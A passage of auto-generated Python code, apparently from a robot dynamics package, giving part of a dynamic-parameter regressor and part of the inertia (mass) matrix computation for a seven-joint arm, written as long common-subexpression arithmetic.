regressor_out[94] = 0
regressor_out[95] = 0
regressor_out[96] = x19
regressor_out[97] = x16 - x20
regressor_out[98] = x18 + x8
regressor_out[99] = x14
regressor_out[100] = x10 + x11
regressor_out[101] = ddq[1]
regressor_out[102] = x24
regressor_out[103] = x62
regressor_out[104] = 0
regressor_out[105] = 0
regressor_out[106] = dq[1]
regressor_out[107] = sign(dq[1])
regressor_out[108] = x27*x35 + x28*x33
regressor_out[109] = x27*x40 + x28*x38
regressor_out[110] = x27*x45 + x688
regressor_out[111] = x107*x26 + x28*x50
regressor_out[112] = x27*x53 + x28*x54
regressor_out[113] = x27*x37 + x28*x39
regressor_out[114] = 0.03175*x134 - 0.27857*x26*x56 + x27*x59 - 0.27857*x688
regressor_out[115] = -0.27857*x26*x66 + x28*x58 - 0.27857*x28*x68 + 0.03175*x40
regressor_out[116] = -0.27857*x26*x52 + x27*x70 + x28*x65 - 0.27857*x28*x74 - 0.03175*x41 - 0.03175*x42
regressor_out[117] = -0.27857*x26*x70 - 0.27857*x28*x64 + 0.03175*x58
regressor_out[118] = 0
regressor_out[119] = 0
regressor_out[120] = x27*x92 + x28*x88
regressor_out[121] = x103*x27 + x28*x99
regressor_out[122] = x112*x28 + x115*x27
regressor_out[123] = x118*x28 + x27*x91
regressor_out[124] = x121*x28 + x123*x27
regressor_out[125] = x126*x27 + x127*x28
regressor_out[126] = 0.03175*x111 - 0.27857*x129*x28 - 0.27857*x132*x26 + 0.03175*x139 + x140*x27 + x143*x28
regressor_out[127] = -0.27857*x147*x26 - 0.27857*x149*x28 + 0.03175*x152 + 0.03175*x153 + x156*x27 + x157*x28
regressor_out[128] = -0.27857*x162*x26 - 0.27857*x164*x28 + 0.03175*x166 + x167*x27 + x168*x28
regressor_out[129] = -0.27857*x142*x28 - 0.27857*x169*x26 + 0.03175*x171 + x172*x27
regressor_out[130] = 0
regressor_out[131] = 0
regressor_out[132] = x184*x27 + x188*x28
regressor_out[133] = x196*x27 + x201*x28
regressor_out[134] = x209*x27 + x214*x28
regressor_out[135] = x217*x27 + x219*x28
regressor_out[136] = x224*x27 + x227*x28
regressor_out[137] = x230*x27 + x233*x28
regressor_out[138] = x244*x28 - 0.27857*x246*x28 + 0.03175*x250 + 0.03175*x255 + x256*x27 - 0.27857*x257*x26
regressor_out[139] = -0.27857*x26*x264 + 0.03175*x266 + 0.03175*x269 + x27*x270 + x276*x28 - 0.27857*x278*x28
regressor_out[140] = -0.27857*x26*x291 + x27*x299 - 0.27857*x28*x293 + x28*x295 + 0.03175*x296 + 0.03175*x297
regressor_out[141] = -0.27857*x26*x306 + x27*x311 - 0.27857*x28*x302 + x28*x313 + 0.03175*x308 + 0.03175*x310
regressor_out[142] = 0
regressor_out[143] = 0
regressor_out[144] = x27*x334 + x28*x332
regressor_out[145] = x27*x350 + x28*x348
regressor_out[146] = x27*x364 + x28*x362
regressor_out[147] = x27*x372 + x28*x370
regressor_out[148] = x27*x383 + x28*x384
regressor_out[149] = x27*x392 + x28*x390
regressor_out[150] = -0.27857*x26*x415 + x27*x406 - 0.27857*x28*x410 + x28*x414 + 0.03175*x403 + 0.03175*x405
regressor_out[151] = -0.27857*x26*x438 + x27*x432 - 0.27857*x28*x436 + x28*x442 + 0.03175*x429 + 0.03175*x431
regressor_out[152] = -0.27857*x26*x461 + x27*x466 - 0.27857*x28*x456 + x28*x467 + 0.03175*x463 + 0.03175*x464
regressor_out[153] = -0.27857*x26*x477 + x27*x482 - 0.27857*x28*x473 + x28*x483 + 0.03175*x480 + 0.03175*x481
regressor_out[154] = 0
regressor_out[155] = 0
regressor_out[156] = x27*x505 + x28*x506
regressor_out[157] = x27*x521 + x28*x524
regressor_out[158] = x27*x539 + x28*x542
regressor_out[159] = x27*x553 + x28*x554
regressor_out[160] = x27*x567 + x28*x568
regressor_out[161] = x27*x578 + x28*x579
regressor_out[162] = -0.27857*x26*x601 + x27*x608 - 0.27857*x28*x603 + x28*x609 + 0.03175*x605 + 0.03175*x607
regressor_out[163] = -0.27857*x26*x632 + x27*x639 - 0.27857*x28*x634 + x28*x640 + 0.03175*x637 + 0.03175*x638
regressor_out[164] = -0.27857*x26*x654 + x27*x667 - 0.27857*x28*x649 + x28*x668 + 0.03175*x664 + 0.03175*x665
regressor_out[165] = -0.27857*x26*x685 + x27*x681 + x28*x674 - 0.27857*x28*x683 + 0.03175*x678 + 0.03175*x680
regressor_out[166] = 0
regressor_out[167] = 0
regressor_out[168] = 0
regressor_out[169] = 0
regressor_out[170] = 0
regressor_out[171] = 0
regressor_out[172] = 0
regressor_out[173] = 0
regressor_out[174] = 0
regressor_out[175] = 0
regressor_out[176] = 0
regressor_out[177] = 0
regressor_out[178] = 0
regressor_out[179] = 0
regressor_out[180] = 0
regressor_out[181] = 0
regressor_out[182] = 0
regressor_out[183] = 0
regressor_out[184] = 0
regressor_out[185] = 0
regressor_out[186] = 0
regressor_out[187] = 0
regressor_out[188] = 0
regressor_out[189] = 0
regressor_out[190] = 0
regressor_out[191] = 0
regressor_out[192] = x32
regressor_out[193] = x43
regressor_out[194] = x51
regressor_out[195] = x31
regressor_out[196] = x52
regressor_out[197] = x47
regressor_out[198] = x64
regressor_out[199] = x71
regressor_out[200] = 0
regressor_out[201] = 0
regressor_out[202] = dq[2]
regressor_out[203] = sign(dq[2])
regressor_out[204] = x93
regressor_out[205] = x104
regressor_out[206] = x110
regressor_out[207] = x116
regressor_out[208] = x124
regressor_out[209] = x125
regressor_out[210] = x144
regressor_out[211] = x151
regressor_out[212] = x160
regressor_out[213] = x174
regressor_out[214] = 0
regressor_out[215] = 0
regressor_out[216] = x189
regressor_out[217] = x202
regressor_out[218] = x215
regressor_out[219] = x220
regressor_out[220] = x228
regressor_out[221] = x234
regressor_out[222] = x259
regressor_out[223] = x280
regressor_out[224] = x287
regressor_out[225] = x314
regressor_out[226] = 0
regressor_out[227] = 0
regressor_out[228] = x331
regressor_out[229] = x347
regressor_out[230] = x365
regressor_out[231] = x373
regressor_out[232] = x381
regressor_out[233] = x389
regressor_out[234] = x417
regressor_out[235] = x443
regressor_out[236] = x455
regressor_out[237] = x472
regressor_out[238] = 0
regressor_out[239] = 0
regressor_out[240] = x503
regressor_out[241] = x525
regressor_out[242] = x543
regressor_out[243] = x551
regressor_out[244] = x565
regressor_out[245] = x576
regressor_out[246] = x597
regressor_out[247] = x628
regressor_out[248] = x663
regressor_out[249] = x687
regressor_out[250] = 0
regressor_out[251] = 0
regressor_out[252] = 0
regressor_out[253] = 0
regressor_out[254] = 0
regressor_out[255] = 0
regressor_out[256] = 0
regressor_out[257] = 0
regressor_out[258] = 0
regressor_out[259] = 0
regressor_out[260] = 0
regressor_out[261] = 0
regressor_out[262] = 0
regressor_out[263] = 0
regressor_out[264] = 0
regressor_out[265] = 0
regressor_out[266] = 0
regressor_out[267] = 0
regressor_out[268] = 0
regressor_out[269] = 0
regressor_out[270] = 0
regressor_out[271] = 0
regressor_out[272] = 0
regressor_out[273] = 0
regressor_out[274] = 0
regressor_out[275] = 0
regressor_out[276] = 0
regressor_out[277] = 0
regressor_out[278] = 0
regressor_out[279] = 0
regressor_out[280] = 0
regressor_out[281] = 0
regressor_out[282] = 0
regressor_out[283] = 0
regressor_out[284] = 0
regressor_out[285] = 0
regressor_out[286] = 0
regressor_out[287] = 0
regressor_out[288] = x91
regressor_out[289] = x102
regressor_out[290] = x114
regressor_out[291] = x90
regressor_out[292] = x122
regressor_out[293] = x108
regressor_out[294] = x137
regressor_out[295] = x155
regressor_out[296] = 0
regressor_out[297] = 0
regressor_out[298] = dq[3]
regressor_out[299] = sign(dq[3])
regressor_out[300] = x183
regressor_out[301] = x195
regressor_out[302] = x208
regressor_out[303] = x216
regressor_out[304] = x223
regressor_out[305] = x229
regressor_out[306] = x252
regressor_out[307] = x268
regressor_out[308] = x298
regressor_out[309] = x309
regressor_out[310] = 0
regressor_out[311] = 0
regressor_out[312] = x333
regressor_out[313] = x349
regressor_out[314] = x363
regressor_out[315] = x371
regressor_out[316] = x382
regressor_out[317] = x391
regressor_out[318] = x401
regressor_out[319] = x427
regressor_out[320] = x465
regressor_out[321] = x479
regressor_out[322] = 0
regressor_out[323] = 0
regressor_out[324] = x504
regressor_out[325] = x520
regressor_out[326] = x538
regressor_out[327] = x552
regressor_out[328] = x566
regressor_out[329] = x577
regressor_out[330] = x606
regressor_out[331] = x636
regressor_out[332] = x666
regressor_out[333] = x676
regressor_out[334] = 0
regressor_out[335] = 0
regressor_out[336] = 0
regressor_out[337] = 0
regressor_out[338] = 0
regressor_out[339] = 0
regressor_out[340] = 0
regressor_out[341] = 0
regressor_out[342] = 0
regressor_out[343] = 0
regressor_out[344] = 0
regressor_out[345] = 0
regressor_out[346] = 0
regressor_out[347] = 0
regressor_out[348] = 0
regressor_out[349] = 0
regressor_out[350] = 0
regressor_out[351] = 0
regressor_out[352] = 0
regressor_out[353] = 0
regressor_out[354] = 0
regressor_out[355] = 0
regressor_out[356] = 0
regressor_out[357] = 0
regressor_out[358] = 0
regressor_out[359] = 0
regressor_out[360] = 0
regressor_out[361] = 0
regressor_out[362] = 0
regressor_out[363] = 0
regressor_out[364] = 0
regressor_out[365] = 0
regressor_out[366] = 0
regressor_out[367] = 0
regressor_out[368] = 0
regressor_out[369] = 0
regressor_out[370] = 0
regressor_out[371] = 0
regressor_out[372] = 0
regressor_out[373] = 0
regressor_out[374] = 0
regressor_out[375] = 0
regressor_out[376] = 0
regressor_out[377] = 0
regressor_out[378] = 0
regressor_out[379] = 0
regressor_out[380] = 0
regressor_out[381] = 0
regressor_out[382] = 0
regressor_out[383] = 0
regressor_out[384] = x186
regressor_out[385] = x199
regressor_out[386] = x211
regressor_out[387] = x185
regressor_out[388] = x225
regressor_out[389] = x203
regressor_out[390] = x242
regressor_out[391] = x275
regressor_out[392] = 0
regressor_out[393] = 0
regressor_out[394] = dq[4]
regressor_out[395] = sign(dq[4])
regressor_out[396] = x330
regressor_out[397] = x340
regressor_out[398] = x356
regressor_out[399] = x367
regressor_out[400] = x380
regressor_out[401] = x388
regressor_out[402] = x413
regressor_out[403] = x441
regressor_out[404] = x444
regressor_out[405] = 0
regressor_out[406] = 0
regressor_out[407] = 0
regressor_out[408] = x502
regressor_out[409] = x522
regressor_out[410] = x540
regressor_out[411] = x550
regressor_out[412] = x564
regressor_out[413] = x575
regressor_out[414] = x596
regressor_out[415] = x627
regressor_out[416] = x662
regressor_out[417] = 0
regressor_out[418] = 0
regressor_out[419] = 0
regressor_out[420] = 0
regressor_out[421] = 0
regressor_out[422] = 0
regressor_out[423] = 0
regressor_out[424] = 0
regressor_out[425] = 0
regressor_out[426] = 0
regressor_out[427] = 0
regressor_out[428] = 0
regressor_out[429] = 0
regressor_out[430] = 0
regressor_out[431] = 0
regressor_out[432] = 0
regressor_out[433] = 0
regressor_out[434] = 0
regressor_out[435] = 0
regressor_out[436] = 0
regressor_out[437] = 0
regressor_out[438] = 0
regressor_out[439] = 0
regressor_out[440] = 0
regressor_out[441] = 0
regressor_out[442] = 0
regressor_out[443] = 0
regressor_out[444] = 0
regressor_out[445] = 0
regressor_out[446] = 0
regressor_out[447] = 0
regressor_out[448] = 0
regressor_out[449] = 0
regressor_out[450] = 0
regressor_out[451] = 0
regressor_out[452] = 0
regressor_out[453] = 0
regressor_out[454] = 0
regressor_out[455] = 0
regressor_out[456] = 0
regressor_out[457] = 0
regressor_out[458] = 0
regressor_out[459] = 0
regressor_out[460] = 0
regressor_out[461] = 0
regressor_out[462] = 0
regressor_out[463] = 0
regressor_out[464] = 0
regressor_out[465] = 0
regressor_out[466] = 0
regressor_out[467] = 0
regressor_out[468] = 0
regressor_out[469] = 0
regressor_out[470] = 0
regressor_out[471] = 0
regressor_out[472] = 0
regressor_out[473] = 0
regressor_out[474] = 0
regressor_out[475] = 0
regressor_out[476] = 0
regressor_out[477] = 0
regressor_out[478] = 0
regressor_out[479] = 0
regressor_out[480] = x326
regressor_out[481] = x344
regressor_out[482] = x359
regressor_out[483] = x325
regressor_out[484] = x377
regressor_out[485] = x353
regressor_out[486] = x394
regressor_out[487] = x421
regressor_out[488] = 0
regressor_out[489] = 0
regressor_out[490] = dq[5]
regressor_out[491] = sign(dq[5])
regressor_out[492] = x494
regressor_out[493] = x518
regressor_out[494] = x536
regressor_out[495] = x547
regressor_out[496] = x561
regressor_out[497] = x569
regressor_out[498] = x588
regressor_out[499] = x619
regressor_out[500] = x656
regressor_out[501] = 0
regressor_out[502] = 0
regressor_out[503] = 0
regressor_out[504] = 0
regressor_out[505] = 0
regressor_out[506] = 0
regressor_out[507] = 0
regressor_out[508] = 0
regressor_out[509] = 0
regressor_out[510] = 0
regressor_out[511] = 0
regressor_out[512] = 0
regressor_out[513] = 0
regressor_out[514] = 0
regressor_out[515] = 0
regressor_out[516] = 0
regressor_out[517] = 0
regressor_out[518] = 0
regressor_out[519] = 0
regressor_out[520] = 0
regressor_out[521] = 0
regressor_out[522] = 0
regressor_out[523] = 0
regressor_out[524] = 0
regressor_out[525] = 0
regressor_out[526] = 0
regressor_out[527] = 0
regressor_out[528] = 0
regressor_out[529] = 0
regressor_out[530] = 0
regressor_out[531] = 0
regressor_out[532] = 0
regressor_out[533] = 0
regressor_out[534] = 0
regressor_out[535] = 0
regressor_out[536] = 0
regressor_out[537] = 0
regressor_out[538] = 0
regressor_out[539] = 0
regressor_out[540] = 0
regressor_out[541] = 0
regressor_out[542] = 0
regressor_out[543] = 0
regressor_out[544] = 0
regressor_out[545] = 0
regressor_out[546] = 0
regressor_out[547] = 0
regressor_out[548] = 0
regressor_out[549] = 0
regressor_out[550] = 0
regressor_out[551] = 0
regressor_out[552] = 0
regressor_out[553] = 0
regressor_out[554] = 0
regressor_out[555] = 0
regressor_out[556] = 0
regressor_out[557] = 0
regressor_out[558] = 0
regressor_out[559] = 0
regressor_out[560] = 0
regressor_out[561] = 0
regressor_out[562] = 0
regressor_out[563] = 0
regressor_out[564] = 0
regressor_out[565] = 0
regressor_out[566] = 0
regressor_out[567] = 0
regressor_out[568] = 0
regressor_out[569] = 0
regressor_out[570] = 0
regressor_out[571] = 0
regressor_out[572] = 0
regressor_out[573] = 0
regressor_out[574] = 0
regressor_out[575] = 0
regressor_out[576] = x498
regressor_out[577] = x509
regressor_out[578] = x532
regressor_out[579] = x497
regressor_out[580] = x555
regressor_out[581] = x528
regressor_out[582] = x582
regressor_out[583] = x612
regressor_out[584] = 0
regressor_out[585] = 0
regressor_out[586] = dq[6]
regressor_out[587] = sign(dq[6])
#
return regressor_out
def M( parms, q ) :
    """Joint-space mass (inertia) matrix M(q) of the 7-DOF arm.

    Machine-generated code (symbolic common-subexpression elimination,
    sympybotics-style); the x* locals are CSE temporaries and must not
    be reordered.

    :param parms: flat list of per-link dynamic parameters, 12 per link
        (inertia tensor, first moments, mass, viscous and Coulomb
        friction) -- see the ``dynparms`` comment at the bottom of this
        module for the exact ordering.
    :param q: joint positions, indexable with at least 7 entries.
    :return: list of 49 floats -- the symmetric 7x7 mass matrix in
        row-major order (M_out[7*i + j] == M[i][j]).
    """
#
    M_out = [0]*49
#
    # common subexpressions (auto-generated; evaluation order matters)
    x0 = cos(q[1])
    x1 = -x0
    x2 = cos(q[2])
    x3 = x1*x2
    x4 = -sin(q[1])
    x5 = -x4
    x6 = 0.27857*x0 + 0.03175*x5
    x7 = -x2
    x8 = x6*x7
    x9 = cos(q[3])
    x10 = sin(q[2])
    x11 = x1*x10
    x12 = -x11
    x13 = sin(q[3])
    x14 = x12*x13 + x5*x9
    x15 = -x3
    x16 = -x15
    x17 = -0.00502*x13*x15 + x8*x9
    x18 = sin(q[4])
    x19 = 0.27747*x16 + x17
    x20 = cos(q[4])
    x21 = x10*x6
    x22 = -x21
    x23 = x22 + 0.00502*x5
    x24 = x11*x9 + x13*x5
    x25 = x23 + 0.27747*x24
    x26 = -x18*x19 - x20*x25
    x27 = x16*x18 + x20*x24
    x28 = -x27
    x29 = sin(q[5])
    x30 = cos(q[5])
    x31 = x14*x30 + x28*x29
    x32 = -x26
    x33 = -x14*x29 - x27*x30
    x34 = -x33
    x35 = -x15*x20 - x18*x24
    x36 = -x35
    x37 = sin(q[6])
    x38 = cos(q[6])
    x39 = -x31*x38 - x36*x37
    x40 = -x18
    x41 = x19*x20 + x25*x40
    x42 = -x41
    x43 = -x13*x8 - 0.00502*x15*x9
    x44 = x29*x42 + x30*x43
    x45 = -x44
    x46 = x32*x38 + x37*x45
    x47 = -parms[79]*x34 + parms[80]*x39 + parms[81]*x46
    x48 = -x32*x37 - x38*x44
    x49 = -x31
    x50 = x36*x38 + x37*x49
    x51 = -parms[78]*x34 + parms[80]*x50 - parms[81]*x48
    x52 = parms[54]*x14 + parms[56]*x28 + parms[57]*x26 - parms[66]*x34 - parms[67]*x31 - parms[69]*x32 - x37*x51 - x38*x47
    x53 = -x14
    x54 = -x29*x43 - x30*x41
    x55 = -x54
    x56 = -parms[66]*x36 - parms[68]*x49 - parms[69]*x54 - parms[78]*x39 + parms[79]*x50 + parms[81]*x55
    x57 = -x37
    x58 = -parms[67]*x36 + parms[68]*x33 + parms[69]*x44 + x38*x51 + x47*x57
    x59 = -x29
    x60 = parms[55]*x53 + parms[56]*x35 + parms[57]*x41 + x30*x56 + x58*x59
    x61 = x20*x60
    x62 = parms[43]*x16 + parms[44]*x14 + parms[45]*x17 + x40*x52 + x61
    x63 = parms[42]*x15 - parms[44]*x24 + parms[45]*x43 + parms[54]*x36 + parms[55]*x27 + parms[57]*x43 + x29*x56 + x30*x58
    x64 = -x13
    x65 = -parms[31]*x5 + parms[32]*x3 + parms[33]*x8 + x62*x9 + x63*x64
    x66 = x2*x65
    x67 = -x43
    x68 = -parms[78]
    x69 = parms[73]*x50 + parms[75]*x39 + parms[76]*x34 + parms[80]*x46 + x55*x68
    x70 = -parms[80]
    x71 = parms[72]*x50 + parms[73]*x39 + parms[74]*x34 + parms[79]*x55 + x48*x70
    x72 = parms[62]*x31 + parms[64]*x33 + parms[65]*x36 + parms[66]*x54 + parms[67]*x45 + x38*x71 + x57*x69
    x73 = parms[49]*x27 + parms[51]*x35 + parms[52]*x14 + parms[54]*x67 + parms[56]*x41 - x72
    x74 = x20*x52
    x75 = -0.27747*x18
    x76 = -x38
    x77 = parms[60]*x31 + parms[61]*x33 + parms[62]*x36 + parms[67]*x32 + parms[68]*x55 + x57*x71 + x69*x76
    x78 = -parms[66]
    x79 = -parms[79]
    x80 = parms[74]*x50 + parms[76]*x39 + parms[77]*x34 + parms[78]*x48 + x46*x79
    x81 = parms[61]*x31 + parms[63]*x33 + parms[64]*x36 + parms[68]*x44 + x32*x78 - x80
    x82 = -x30
    x83 = parms[48]*x27 + parms[49]*x35 + parms[50]*x14 + parms[55]*x43 + parms[56]*x32 + x59*x77 + x81*x82
    x84 = parms[36]*x24 + parms[37]*x14 + parms[38]*x15 + parms[43]*x23 + parms[44]*x67 + x20*x83 + x40*x73 + x60*x75 - 0.27747*x74
    x85 = parms[50]*x27 + parms[52]*x35 + parms[53]*x14 + parms[54]*x26 + parms[55]*x42 + x30*x77 + x59*x81
    x86 = -parms[42]
    x87 = parms[37]*x24 + parms[39]*x14 + parms[40]*x15 + parms[44]*x17 + x23*x86 + x85
    x88 = parms[24]*x11 + parms[25]*x3 + parms[26]*x5 + parms[32]*x22 + x64*x87 + x84*x9
    x89 = -x10
    x90 = -x20
    x91 = 0.27747*x18
    x92 = -parms[43]
    x93 = parms[38]*x24 + parms[40]*x14 + parms[41]*x15 + parms[42]*x43 + x17*x92 + x40*x83 + x52*x91 - 0.27747*x61 + x73*x90
    x94 = x13*x62
    x95 = x63*x9
    x96 = parms[25]*x11 + parms[27]*x3 + parms[28]*x5 + parms[32]*x8 - x93 + 0.00502*x94 + 0.00502*x95
    x97 = parms[42]*x53 + parms[43]*x24 + parms[45]*x23 + x40*x60 - x74
    x98 = parms[30]*x5 + parms[32]*x12 + parms[33]*x21 - x97
    x99 = x10*x98
    x100 = -parms[31]
    x101 = parms[26]*x11 + parms[28]*x3 + parms[29]*x5 + parms[30]*x21 + x100*x8 + x13*x84 + x87*x9 + 0.00502*x97
    x102 = -0.27857*x2
    x103 = -0.27857*x10
    x104 = parms[14]*x0 + parms[16]*x4 + 0.03175*parms[30]*x15 + 0.03175*parms[31]*x11 + x102*x98 + x103*x65 + x2*x88 + x89*x96 + 0.03175*x94 + 0.03175*x95
    x105 = -x89
    x106 = 0.00502*x105 - 0.03175
    x107 = -x103*x13 - x106*x9
    x108 = x2*x9
    x109 = -x105*x20 - x108*x18
    x110 = -x109
    x111 = x105*x40 + x108*x20
    x112 = -x105
    x113 = x103*x9 + x106*x64
    x114 = 0.27747*x112 + x113
    x115 = -x102
    x116 = 0.27747*x108 + x115
    x117 = x114*x20 + x116*x40
    x118 = x107*x30 + x117*x59
    x119 = x2*x64
    x120 = -x111*x30 - x119*x29
    x121 = -x120
    x122 = -x114*x18 - x116*x20
    x123 = -x122
    x124 = x118*x57 + x123*x38
    x125 = x111*x59 + x119*x30
    x126 = -x110*x37 - x125*x38
    x127 = -parms[79]*x121 + parms[80]*x126 + parms[81]*x124
    x128 = x110*x38 + x125*x57
    x129 = -x118*x38 - x123*x37
    x130 = parms[78]*x121 - parms[80]*x128 + parms[81]*x129
    x131 = -parms[67]*x110 + parms[68]*x120 + parms[69]*x118 + x127*x57 + x130*x76
    x132 = -x107*x29 - x117*x30
    x133 = -x132
    x134 = parms[66]*x110 - parms[68]*x125 + parms[69]*x132 + parms[78]*x126 - parms[79]*x128 - parms[81]*x133
    x135 = parms[42]*x105 - parms[44]*x108 + parms[45]*x107 + parms[54]*x110 + parms[55]*x111 + parms[57]*x107 + x131*x30 + x134*x59
    x136 = x135*x9
    x137 = -x119
    x138 = parms[55]*x137 + parms[56]*x109 + parms[57]*x117 + x131*x59 + x134*x82
    x139 = x138*x20
    x140 = parms[54]*x119 - parms[56]*x111 + parms[57]*x122 - parms[66]*x121 - parms[67]*x125 - parms[69]*x123 - x127*x38 - x130*x57
    x141 = parms[74]*x128 + parms[76]*x126 + parms[77]*x121 + parms[78]*x129 + x124*x79
    x142 = parms[61]*x125 + parms[63]*x120 + parms[64]*x110 + parms[68]*x118 + x123*x78 - x141
    x143 = parms[72]*x128 + parms[73]*x126 + parms[74]*x121 + parms[79]*x133 + x129*x70
    x144 = parms[73]*x128 + parms[75]*x126 + parms[76]*x121 + parms[80]*x124 + x133*x68
    x145 = parms[60]*x125 + parms[61]*x120 + parms[62]*x110 + parms[67]*x123 + parms[68]*x133 + x143*x57 + x144*x76
    x146 = parms[48]*x111 + parms[49]*x109 + parms[50]*x119 + parms[55]*x107 + parms[56]*x123 + x142*x82 + x145*x59
    x147 = -x107
    x148 = -parms[67]
    x149 = parms[62]*x125 + parms[64]*x120 + parms[65]*x110 + parms[66]*x132 + x118*x148 + x143*x38 + x144*x57
    x150 = parms[49]*x111 + parms[51]*x109 + parms[52]*x119 + parms[54]*x147 + parms[56]*x117 - x149
    x151 = parms[38]*x108 + parms[40]*x119 + parms[41]*x105 + parms[42]*x107 + x113*x92 - 0.27747*x139 + x140*x91 + x146*x40 + x150*x90
    x152 = parms[43]*x112 + parms[44]*x119 + parms[45]*x113 + x139 + x140*x40
    x153 = x13*x152
    x154 = parms[42]*x137 + parms[43]*x108 + parms[45]*x115 + x138*x40 + x140*x90
    x155 = -0.27747*x20
    x156 = parms[36]*x108 + parms[37]*x119 + parms[38]*x105 + parms[43]*x115 + parms[44]*x147 + x138*x75 + x140*x155 + x146*x20 + x150*x40
    x157 = -parms[55]
    x158 = parms[50]*x111 + parms[52]*x109 + parms[53]*x119 + parms[54]*x122 + x117*x157 + x142*x59 + x145*x30
    x159 = parms[37]*x108 + parms[39]*x119 + parms[40]*x105 + parms[44]*x113 + x115*x86 + x158
    x160 = parms[26]*x2 + parms[28]*x89 + parms[30]*x102 + x100*x103 + x13*x156 + 0.00502*x154 + x159*x9
    x161 = -x9
    x162 = x13*x20
    x163 = x162*x59 + x30*x9
    x164 = x13*x40
    x165 = -x164
    x166 = -x163*x38 - x165*x37
    x167 = x163*x57 + x165*x38
    x168 = 0.27747*x13 + 0.00502
    x169 = x168*x40
    x170 = x169*x82
    x171 = -x170
    x172 = x169*x59
    x173 = -x162*x30 - x29*x9
    x174 = -x173
    x175 = x168*x90
    x176 = -x175
    x177 = x172*x57 + x176*x38
    x178 = -parms[79]*x174 + parms[80]*x166 + parms[81]*x177
    x179 = -x172*x38 - x176*x37
    x180 = parms[78]*x174 - parms[80]*x167 + parms[81]*x179
    x181 = parms[55]*x161 + parms[56]*x164 + parms[57]*x169 + x59*(-parms[67]*x165 + parms[68]*x173 + parms[69]*x172 + x178*x57 + x180*x76) + x82*(parms[66]*x165 - parms[68]*x163 + parms[69]*x170 + parms[78]*x166 - parms[79]*x167 - parms[81]*x171)
    x182 = parms[54]*x9 - parms[56]*x162 + parms[57]*x175 - parms[66]*x174 - parms[67]*x163 - parms[69]*x176 - x178*x38 - x180*x57
    x183 = parms[74]*x167 + parms[76]*x166 + parms[77]*x174 + parms[78]*x179 + x177*x79
    x184 = parms[61]*x163 + parms[63]*x173 + parms[64]*x165 + parms[68]*x172 + x176*x78 - x183
    x185 = parms[73]*x167 + parms[75]*x166 + parms[76]*x174 + parms[80]*x177 + x171*x68
    x186 = parms[72]*x167 + parms[73]*x166 + parms[74]*x174 + parms[79]*x171 + x179*x70
    x187 = parms[60]*x163 + parms[61]*x173 + parms[62]*x165 + parms[67]*x176 + parms[68]*x171 + x185*x76 + x186*x57
    x188 = parms[50]*x162 + parms[52]*x164 + parms[53]*x9 + parms[54]*x175 + x157*x169 + x184*x59 + x187*x30
    x189 = parms[48]*x162 + parms[49]*x164 + parms[50]*x9 + parms[56]*x176 + x184*x82 + x187*x59
    x190 = parms[62]*x163 + parms[64]*x173 + parms[65]*x165 + parms[66]*x170 + x148*x172 + x185*x57 + x186*x38
    x191 = parms[49]*x162 + parms[51]*x164 + parms[52]*x9 + parms[56]*x169 - x190
    x192 = parms[38]*x13 + parms[40]*x9 - 0.27747*x181*x20 + x182*x91 + x189*x40 + x191*x90
    x193 = x155*x82
    x194 = -x193
    x195 = x40*x82
    x196 = -x195
    x197 = x40*x59
    x198 = -x90
    x199 = x197*x57 + x198*x38
    x200 = x155*x59
    x201 = -x91
    x202 = -x200*x38 - x201*x37
    x203 = -x197*x38 - x198*x37
    x204 = parms[72]*x199 + parms[73]*x203 + parms[74]*x196 + parms[79]*x194 + x202*x70
    x205 = x200*x57 + x201*x38
    x206 = parms[73]*x199 + parms[75]*x203 + parms[76]*x196 + parms[80]*x205 + x194*x68
    x207 = parms[62]*x197 + parms[64]*x195 + parms[65]*x198 + parms[66]*x193 + x148*x200 + x204*x38 + x206*x57
    x208 = parms[78]*x196 - parms[80]*x199 + parms[81]*x202
    x209 = -parms[79]*x196 + parms[80]*x203 + parms[81]*x205
    x210 = parms[60]*x197 + parms[61]*x195 + parms[62]*x198 + parms[67]*x201 + parms[68]*x194 + x204*x57 + x206*x76
    x211 = parms[74]*x199 + parms[76]*x203 + parms[77]*x196 + parms[78]*x202 + x205*x79
    x212 = parms[61]*x197 + parms[63]*x195 + parms[64]*x198 + parms[68]*x200 + x201*x78 - x211
    x213 = parms[50]*x40 + parms[52]*x90 + parms[54]*x91 + x155*x157 + x210*x30 + x212*x59
    x214 = -x59
    x215 = x30*x76
    x216 = x30*x57
    x217 = parms[72]*x216 + parms[73]*x215 + parms[74]*x214
    x218 = parms[73]*x216 + parms[75]*x215 + parms[76]*x214
    x219 = parms[74]*x216 + parms[76]*x215 + parms[77]*x214
    x220 = parms[62]*x30 + parms[64]*x59 + x217*x38 + x218*x57
    x221 = parms[74]*x38 + parms[76]*x57
#
    # assemble the symmetric 7x7 mass matrix in row-major order;
    # off-diagonal entries are mirrored (M_out[7*i+j] == M_out[7*j+i])
    M_out[0] = parms[5] + x0*(parms[12]*x0 + parms[13]*x4 - 0.27857*x66 + x7*x96 + x88*x89 + 0.27857*x99) + x4*(parms[13]*x0 + parms[15]*x4 - x101 + 0.03175*x66 - 0.03175*x99)
    M_out[1] = x104
    M_out[2] = x101
    M_out[3] = x93
    M_out[4] = x85
    M_out[5] = x72
    M_out[6] = x80
    M_out[7] = x104
    M_out[8] = parms[17] + 0.03175*parms[30]*x105 + 0.03175*parms[31]*x2 + 0.0010080625*parms[33] + x102*(parms[32]*x7 + parms[33]*x102 - x154) + x103*(parms[32]*x89 + parms[33]*x103 + x135*x64 + x152*x9) + 0.03175*x136 + 0.03175*x153 + x2*(parms[24]*x2 + parms[25]*x89 + 0.03175*parms[31] + parms[32]*x115 + x156*x9 + x159*x64) + x89*(parms[25]*x2 + parms[27]*x89 - 0.03175*parms[30] + parms[32]*x103 + 0.00502*x136 - x151 + 0.00502*x153)
    M_out[9] = x160
    M_out[10] = x151
    M_out[11] = x158
    M_out[12] = x149
    M_out[13] = x141
    M_out[14] = x101
    M_out[15] = x160
    M_out[16] = parms[29] + 0.00502*parms[42]*x161 + 0.00502*parms[43]*x13 + 2.52004e-5*parms[45] + x13*(parms[36]*x13 + parms[37]*x9 + 0.00502*parms[43] + x155*x182 + x181*x75 + x189*x20 + x191*x40) + 0.00502*x181*x40 + 0.00502*x182*x90 + x9*(parms[37]*x13 + parms[39]*x9 - 0.00502*parms[42] + x188)
    M_out[17] = x192
    M_out[18] = x188
    M_out[19] = x190
    M_out[20] = x183
    M_out[21] = x93
    M_out[22] = x151
    M_out[23] = x192
